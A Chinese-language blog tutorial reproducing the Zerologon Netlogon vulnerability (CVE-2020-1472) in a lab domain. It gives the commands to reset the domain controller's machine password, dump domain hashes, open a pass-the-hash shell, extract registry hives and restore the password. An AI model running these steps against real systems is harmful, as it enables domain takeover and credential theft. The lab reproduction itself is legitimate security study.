溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

發(fā)布時(shí)間:2021-12-28 17:18:35 來(lái)源:億速云 閱讀:127 作者:柒染 欄目:安全技術(shù)

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí),很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

1.復(fù)現(xiàn)環(huán)境

DC:
os:windows 2012 server
ip:192.168.236.132

攻擊機(jī):
os:kali
ip:192.168.236.130

2.影響版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控環(huán)境搭建參考文章

sectool/251828.html

4.復(fù)現(xiàn)過程

4.1 漏洞驗(yàn)證

POC鏈接

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2 漏洞利用

安裝最新的Impacket,否則會(huì)報(bào)錯(cuò)

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.1 下載攻擊exp

EXP下載

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.2 置空密碼

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.3 獲取hash

進(jìn)入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.4 獲取shell

python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.5 獲取原h(huán)ash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢復(fù)hash

恢復(fù)鏈接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

4.2.8 驗(yàn)證是否恢復(fù)

使用獲取hash的命令來(lái)驗(yàn)證是否恢復(fù)

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Netlogon特權(quán)提升漏洞CVE 2020-1472該如何復(fù)習(xí)

5.修復(fù)建議

官方修復(fù)建議

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI